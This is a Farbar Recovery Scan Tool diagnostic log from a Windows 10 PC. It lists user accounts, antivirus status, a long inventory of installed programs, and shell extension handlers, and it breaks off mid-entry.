Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21.01.2018 Ran by Kuba (26-01-2018 18:40:30) Running from C:\Users\Kuba\Downloads Windows 10 Pro Version 1709 16299.192 (X64) (2017-12-08 01:13:18) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-3338460377-1035617240-3592817547-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-3338460377-1035617240-3592817547-503 - Limited - Disabled) Guest (S-1-5-21-3338460377-1035617240-3592817547-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-3338460377-1035617240-3592817547-1006 - Limited - Enabled) Kuba (S-1-5-21-3338460377-1035617240-3592817547-1001 - Administrator - Enabled) => C:\Users\Kuba UpdatusUser (S-1-5-21-3338460377-1035617240-3592817547-1004 - Limited - Enabled) => C:\Users\UpdatusUser WDAGUtilityAccount (S-1-5-21-3338460377-1035617240-3592817547-504 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\uTorrent) (Version: 3.5.1.44332 - BitTorrent Inc.) 1500 (HKLM-x32\...\{427385C9-AC30-484B-AC63-94A8B37225D0}) (Version: 140.0.425.000 - Hewlett-Packard) Hidden 1500_Help (HKLM-x32\...\{A2101ACC-DC36-42AA-A576-6FD6A8D466DA}) (Version: 82.0.242.000 - Hewlett-Packard) Hidden 1500Trb (HKLM-x32\...\{A4C6B32D-5088-40AF-B74D-CDABEF144F04}) (Version: 82.0.242.000 - Hewlett-Packard) Hidden 64 Bit HP CIO Components Installer (HKLM\...\{FF21C3E6-97FD-474F-9518-8DCBE94C2854}) (Version: 7.2.8 - Hewlett-Packard) Hidden ABBYY FineReader 12 Professional (HKLM-x32\...\{F12000FE-0001-0000-0000-074957833700}) (Version: 12.1.609 - ABBYY Production LLC) Adobe After Effects CC 2017 (HKLM-x32\...\AEFT_14_1_0) (Version: 14.1.0 - Adobe Systems Incorporated) Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated) Adobe Flash Player 28 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 28.0.0.137 - Adobe Systems Incorporated) AE CC x64 (HKLM\...\{672FEEBA-F29C-4363-A8D0-8EBA61265B88}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden AIO_CDB_ProductContext (HKLM-x32\...\{D5045A94-1D46-44A7-9C4F-7D05B40D82EC}) (Version: 140.0.425.000 - Hewlett-Packard) Hidden AIO_CDB_Software (HKLM-x32\...\{2DFDE21D-AFFE-4CDD-BBD4-3B7832BEC036}) (Version: 140.0.428.000 - Hewlett-Packard) Hidden AIO_Scan (HKLM-x32\...\{104066F4-5897-4067-85D3-4C88B67CCF75}) (Version: 130.0.421.000 - Hewlett-Packard) Hidden Aktualizacje NVIDIA 23.1.0.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 23.1.0.0 - NVIDIA Corporation) Hidden Assassin's Creed IV Black Flag (HKLM-x32\...\Uplay Install 273) (Version: - Ubisoft) Audacity 2.1.3 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.3 - Audacity Team) Azure AD Authentication Connected Service (HKLM-x32\...\{3FEAC561-1CF6-41D6-B0F3-BECDD9C88A1B}) (Version: 14.0.23107 - Microsoft Corporation) Hidden AzureTools.Notifications (HKLM-x32\...\{1E5CA362-39B6-4BD0-B9C0-69CF15F0FEA2}) (Version: 2.7.30611.1601 - Microsoft Corporation) Hidden Backup and Sync from Google (HKLM-x32\...\{908DB568-E5FA-40C7-A2AA-AB340190858B}) (Version: 3.38.7642.3857 - Google, Inc.) Battlefield: Bad Company™ 2 (HKLM-x32\...\{3AC8457C-0385-4BEA-A959-E095F05D6D67}) (Version: 1.0.0.0 - Electronic Arts) Blend for Visual Studio SDK for .NET 4.5 (HKLM-x32\...\{37E53780-3944-4A6A-842F-727128E8616E}) (Version: 3.0.40218.0 - Microsoft Corporation) Hidden Blend for Visual Studio SDK for Silverlight 5 (HKLM-x32\...\{0C03A66F-1FF0-45F9-8D67-0D806EBFFBA1}) (Version: 3.0.40218.0 - Microsoft Corporation) Hidden BufferChm (HKLM-x32\...\{FA0FF682-CC70-4C57-93CD-E276F3E7537E}) (Version: 140.0.298.000 - Hewlett-Packard) Hidden Build Tools — zasoby językowe - x86 (HKLM-x32\...\{33D9C76B-0241-3C3B-9088-129B05678083}) (Version: 12.0.21005 - Microsoft Corporation) Hidden Car Mechanic Simulator 2015 Gold Edition (HKLM-x32\...\Car Mechanic Simulator 2015 Gold Edition_is1) (Version: - ) Copy (HKLM-x32\...\{9BE466FF-70B7-4DA8-807C-DB4C3610FDAA}) (Version: 140.0.298.000 - Hewlett-Packard) Hidden CPUID HWMonitor 1.29 (HKLM\...\CPUID HWMonitor_is1) (Version: - ) Deluxe Ski Jump 4 (HKLM-x32\...\Deluxe Ski Jump 4_is1) (Version: 1.6.1 - Mediamond Tmi) Destinations (HKLM-x32\...\{BD7204BA-DD64-499E-9B55-6A282CDF4FA4}) (Version: 140.0.253.000 - Hewlett-Packard) Hidden DeviceDiscovery (HKLM-x32\...\{1458BB78-1DC5-4BC0-B9A3-2B644F5A8105}) (Version: 140.0.298.000 - Hewlett-Packard) Hidden DocProc (HKLM-x32\...\{9B362566-EC1B-4700-BB9C-EC661BDE2175}) (Version: 140.0.185.000 - Hewlett-Packard) Hidden Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD) Euro Truck Simulator 2 (HKLM-x32\...\Euro Truck Simulator 2_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter) Fax (HKLM-x32\...\{9294F169-72EE-4D74-AE92-CA25F64B4FF8}) (Version: 140.0.307.000 - Hewlett-Packard) Hidden FIFA 14 (HKLM-x32\...\{AA7A2800-1E75-4240-855B-03AFF8E5171E}) (Version: 1.0.0.7 - Electronic Arts) FIFA 15 (HKLM-x32\...\FIFA 15_is1) (Version: - ) FormatFactory 4.2.0.0 (HKLM-x32\...\FormatFactory) (Version: 4.2.0.0 - Free Time) GIMP 2.8.22 (HKLM\...\GIMP-2_is1) (Version: 2.8.22 - The GIMP Team) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden GPBaseService2 (HKLM-x32\...\{BB3447F6-9553-4AA9-960E-0DB5310C5779}) (Version: 140.0.297.000 - Hewlett-Packard) Hidden Hama Black Force Pad (HKLM-x32\...\{4999B2F1-3E74-409A-B8B5-E94448AA9EA6}) (Version: 2007.01.01 - ) Hitman Absolution - Professional Edition (HKLM-x32\...\Hitman Absolution - Professional Edition_is1) (Version: - ) HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP) HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard) HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP) HP Photosmart Officejet and Deskjet All-In-One Driver Software (HKLM\...\{6F5B70F0-EA6C-4A5B-BB16-8390BD66B251}) (Version: 14.0 - HP) HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HPPhotoGadget (HKLM-x32\...\{CAE4213F-F797-439D-BD9E-79B71D115BE3}) (Version: 140.0.524.000 - Hewlett-Packard) Hidden HPProductAssistant (HKLM-x32\...\{150B6201-E9E6-4DFB-960E-CCBD53FBDDED}) (Version: 140.0.298.000 - Hewlett-Packard) Hidden Java 8 Update 131 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180131F0}) (Version: 8.0.1310.11 - Oracle Corporation) LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - ) LocalESPCui for pl-pl (HKLM-x32\...\{3D2E150E-E1E8-FB7F-1419-7117A955D595}) (Version: 8.59.29989 - Microsoft) Hidden Malwarebytes (wersja 3.1.2.1733) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes) MarketResearch (HKLM-x32\...\{D360FA88-17C8-4F14-B67F-13AAF9607B12}) (Version: 140.0.299.000 - Hewlett-Packard) Hidden MegaTrainer eXperience V1.3.2.8 (HKLM-x32\...\MegaTrainer eXperience_is1) (Version: - ) Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation) Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation) Microsoft Office Professional Plus 2016 (HKLM-x32\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation) Microsoft Visual Studio Community 2015 with Update 1 (HKLM-x32\...\{1d03ad7c-fa27-4517-91b0-410bb49f94d9}) (Version: 14.0.24720.1 - Microsoft Corporation) Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft) MSBuild/NuGet Integration 14.0 (x86) (HKLM-x32\...\{FA0599C5-C083-41BE-8AEA-E8EB9070D128}) (Version: 14.0.24720 - Microsoft Corporation) Hidden Multi-Device Hybrid Apps using C# - Templates - ENU (HKLM-x32\...\{12D99739-FFD3-3761-8AA6-F929E0FE407E}) (Version: 14.0.23107 - Microsoft Corporation) Hidden Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM-x32\...\{90160000-001F-0415-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden Network64 (HKLM\...\{6BFAB6C1-6D46-46DB-A538-A269907C9F2F}) (Version: 140.0.306.000 - Hewlett-Packard) Hidden NVIDIA GeForce Experience 3.2.0.96 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.2.0.96 - NVIDIA Corporation) NVIDIA Oprogramowanie systemu PhysX 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation) NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.2.0.96 - NVIDIA Corporation) Hidden NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 2.0.0.0 - NVIDIA Corporation) Hidden Obsługa programów Apple (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.) OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP) OpenAL (HKLM-x32\...\OpenAL) (Version: - ) Origin (HKLM-x32\...\Origin) (Version: 10.5.8.17910 - Electronic Arts, Inc.) PreEmptive Analytics Visual Studio Components (HKLM-x32\...\{436A18DD-5F2C-4B3C-985E-AD3C13B0CC25}) (Version: 1.2.5134.1 - PreEmptive Solutions) Hidden Prezi Desktop (HKLM-x32\...\{0e5e27aa-4f81-4a4b-9f13-d8b8530fcc2b}) (Version: 6.16.2.0 - Prezi) Prezi Desktop (HKLM-x32\...\{B40BDF9A-CFB1-4E9E-AB8A-8C0F7F4070ED}) (Version: 6.16.2.0 - Prezi) Hidden Pro Evolution Soccer 2016 Update v1.04 (HKLM-x32\...\UHJvRXZvbHV0aW9uU29jY2VyMjAxNg==_is1) (Version: 1 - ) Przygotowanie programu Microsoft Visual Studio 2015 (HKLM-x32\...\{F9A8D7F5-9E68-4415-BFA0-869B1C14FEE5}) (Version: 14.0.23107 - Microsoft Corporation) Hidden QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7708 - Realtek Semiconductor Corp.) Risen wersja 1.0.2.0 (HKLM-x32\...\Risen_is1) (Version: 1.0.2.0 - GTX Box Team) Roslyn Language Services - x86 (HKLM-x32\...\{3107684C-8011-3031-BD28-10CA30F58267}) (Version: 14.0.24730 - Microsoft Corporation) Hidden Roslyn Language Services - x86 (HKLM-x32\...\{6C1985E7-E1C5-3A95-86EF-2C62465F15C3}) (Version: 14.0.23107 - Microsoft Corporation) Hidden Scan (HKLM-x32\...\{06A1D88C-E102-4527-AF70-29FFD7AF215A}) (Version: 140.0.253.000 - Hewlett-Packard) Hidden SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0350 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.2.0.96 - NVIDIA Corporation) Hidden Skype (wersja 8.13) (HKLM-x32\...\Skype_is1) (Version: 8.13 - Skype Technologies S.A.) SolutionCenter (HKLM-x32\...\{BC5DD87B-0143-4D14-AAE6-97109614DC6B}) (Version: 140.0.299.000 - Hewlett-Packard) Hidden Sp5 (HKLM-x32\...\{560F47F7-EB23-44B1-AAFC-667F1CD8FE5C}) (Version: 5.1.4324.0 - Microsoft) Hidden Sp5Intl (HKLM-x32\...\{FD4B33E1-24AE-4535-AA7B-162B30FB57CD}) (Version: 5.1.4324.0 - Microsoft) Hidden Sp5TTInt (HKLM-x32\...\{E415C943-37E5-473F-8BAE-043C56734124}) (Version: 5.1.4324.0 - Microsoft) Hidden SpCommon (HKLM-x32\...\{6C3959C6-943E-44B3-BAAD-570B04B134E5}) (Version: 5.1.4324.0 - Microsoft) Hidden Spotify (HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\Spotify) (Version: 1.0.66.478.g1296534d - Spotify AB) SpPhones (HKLM-x32\...\{4DFF1415-4C29-44A8-BFD4-2BCE249C4991}) (Version: 6.0.3122.0 - Microsoft) Hidden Status (HKLM-x32\...\{5B025634-7D5B-4B8D-BE2A-7943C1CF2D5D}) (Version: 140.0.342.000 - Hewlett-Packard) Hidden Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Szablony projektów i elementów dla programu Visual Studio Community 2015 — PLK (HKLM-x32\...\{4251107D-2810-4E04-8ADA-4A25309385AB}) (Version: 14.0.23107 - Microsoft Corporation) Hidden Team Explorer for Microsoft Visual Studio 2015 (HKLM-x32\...\{48992F68-BEE6-35D8-89AC-6A81406F1096}) (Version: 14.0.24712 - Microsoft Corporation) Hidden TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.0.5640 - TeamViewer) TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp) Test Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{9EABBFE1-7EED-47D9-8FB8-21D7E4808057}) (Version: 14.0.23107 - Microsoft Corporation) Hidden The Elder Scrolls V Skyrim Legendary Edition wersja 1.9.32.8 (HKLM-x32\...\The Elder Scrolls V Skyrim Legendary Edition_is1) (Version: 1.9.32.8 - GTX Box Team) The Witcher 2 - Assassins of Kings Enhanced Edition (HKLM-x32\...\GOGPACKTHEWITCHER2EE_is1) (Version: 3.4.0.25 - GOG.com) Thief wersja 1.7 build 4158.21 (HKLM-x32\...\{13F7E76F-C206-445E-866E-40CA4D959BD1}_is1) (Version: 1.7 build 4158.21 - Square Enix) Toolbox (HKLM-x32\...\{292F0F52-B62D-4E71-921B-89A682402201}) (Version: 140.0.596.000 - Hewlett-Packard) Hidden TrayApp (HKLM-x32\...\{CD31E63D-47FD-491C-8117-CF201D0AFAB5}) (Version: 140.0.297.000 - Hewlett-Packard) Hidden Unity Web Player (HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\UnityWebPlayer) (Version: 4.6.2f1 - Unity Technologies ApS) Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden Universal CRT Extension SDK (HKLM-x32\...\{284FA9A0-CEDD-81D3-5A19-5858E95FD0C4}) (Version: 10.0.10150 - Microsoft Corporation) Hidden Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden Universal CRT Headers Libraries and Sources (HKLM-x32\...\{ABD37F71-FC3F-F525-C7B3-BDD95F684C51}) (Version: 10.0.10150 - Microsoft Corporation) Hidden Universal CRT Redistributable (HKLM-x32\...\{8E3ADB96-CF58-757C-ADBC-BD21D5061E51}) (Version: 10.1.10586.15 - Microsoft Corporation) Hidden Universal CRT Tools x64 (HKLM\...\{4EE952FC-2888-39E8-75D5-E07FA9557985}) (Version: 10.1.10586.15 - Microsoft Corporation) Hidden Universal CRT Tools x86 (HKLM-x32\...\{5B513DDE-9CE5-386D-961E-9D3B9223F95C}) (Version: 10.1.10586.15 - Microsoft Corporation) Hidden Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation) Update for Skype for Business 2016 (KB4011623) 32-Bit Edition (HKLM-x32\...\{90160000-0011-0000-0000-0000000FF1CE}_Office16.PROPLUS_{EFA705B6-E8ED-4E9A-9C21-78622E54A2B6}) (Version: - Microsoft) Update for Skype for Business 2016 (KB4011623) 32-Bit Edition (HKLM-x32\...\{90160000-002A-0000-1000-0000000FF1CE}_Office16.PROPLUS_{EFA705B6-E8ED-4E9A-9C21-78622E54A2B6}) (Version: - Microsoft) Update for Skype for Business 2016 (KB4011623) 32-Bit Edition (HKLM-x32\...\{90160000-012B-0415-0000-0000000FF1CE}_Office16.PROPLUS_{EFA705B6-E8ED-4E9A-9C21-78622E54A2B6}) (Version: - Microsoft) Uplay (HKLM-x32\...\Uplay) (Version: 2.0 - Ubisoft) Usługi języka Roslyn - x86 (HKLM-x32\...\{1ECF9153-D2CF-31DF-A356-F3976554E60B}) (Version: 14.0.24720 - Microsoft Corporation) Hidden Vegas Pro 13.0 (64-bit) (HKLM\...\{1EEE0BEE-0BC8-11E5-A19E-F04DA23A5C58}) (Version: 13.0.453 - Sony) VirtualDJ 8 (HKLM-x32\...\{E1962904-0960-42F6-9072-3EC7D66A5495}) (Version: 8.2.3994.0 - Atomix Productions) Visual Studio 2015 Update 1 (KB3022398) (HKLM-x32\...\{fcaa9dba-9438-48b6-ad91-4e9b4cc7084a}) (Version: 14.0.24720 - Microsoft Corporation) VLC media player (HKLM\...\VLC media player) (Version: 2.2.6 - VideoLAN) VS Update core components (HKLM-x32\...\{5F7870A1-0586-313E-A9FF-3249DCE9F63A}) (Version: 14.0.24720 - Microsoft Corporation) Hidden WCF Data Services 5.6.4 Runtime (HKLM-x32\...\{DB85E7BD-B2DD-43D4-B3C0-23D7B527B597}) (Version: 5.6.62175.4 - Microsoft Corporation) Hidden WCF Data Services Tools for Microsoft Visual Studio 2015 (HKLM-x32\...\{0A3B508E-5638-4471-BCC9-954E1868CB86}) (Version: 5.6.62175.4 - Microsoft Corporation) Hidden WebReg (HKLM-x32\...\{8EE94FD8-5F52-4463-A340-185D16328158}) (Version: 140.0.297.017 - Hewlett-Packard) Hidden Widoki sieci Web debugera wydajności programu Microsoft Visual Studio 2015 Update 1 — zasoby dla wersji PLK (HKLM-x32\...\{508D12B1-440F-4B74-883A-3729CD4AFE8D}) (Version: 14.0.24720 - Microsoft Corporation) Hidden Windows 7 Games for Windows 8 and 10 (HKLM-x32\...\MicrosoftGamesForWin8) (Version: 1.1.0.10 - ) WinRAR 5.21 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH) Wise Auto Shutdown 1.48 (HKLM-x32\...\Wise Auto Shutdown_is1) (Version: 1.48 - WiseCleaner.com, Inc.) Xvid Video Codec (HKLM-x32\...\Xvid Video Codec 1.3.4) (Version: 1.3.4 - Xvid Team) 生成工具语言资源 - amd64 (HKLM\...\{00BD41AD-6164-3C34-9334-F34995991166}) (Version: 12.0.21005 - Microsoft Corporation) Hidden ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File CustomCLSID: HKU\S-1-5-21-3338460377-1035617240-3592817547-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Kuba\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\amd64\FileSyncShell64.dll => No File ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-11-20] (Google) ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-11-20] (Google) ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-11-20] (Google) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] () ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] () ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] () ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> No File ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] () ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> No File ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18011-0\ShellExt.dll [2017-09-29] (Microsoft Corporation) ContextMenuHandlers1: [FineReader12ContextMenu] -> {55344AC6-630B-430C-B292-C7BE21F90061} => D:\ABBYY FineReader12\FRIntegration.x64.dll [2016-01-20] (ABBYY Production LLC.) ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files (x86)\Google\Drive\contextmenu64.dll [2017-11-20] (Google) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\winrar\rarext.dll [2015-03-09] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => D:\winrar\rarext32.dll [2015-03-09] (Alexander Roshal) ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18011-0\ShellExt.dll [2017-09-29] (Microsoft Corporation) ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> No File ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> No File ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18011-0\ShellExt.dll [2017-09-29] (Microsoft Corporation) ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files (x86)\Google\Drive\contextmenu64.dll [2017-11-20] (Google) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2016-11-14] (NVIDIA Corporation) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] () ContextMenuHandlers6: [FineReader12ContextMenu] -> {55344AC6-630B-430C-B292-C7BE21F90061} => D:\ABBYY FineReader12\FRIntegration.x64.dll [2016-01-20] (ABBYY Production LLC.) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => D:\winrar\rarext.dll [2015-03-09] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> 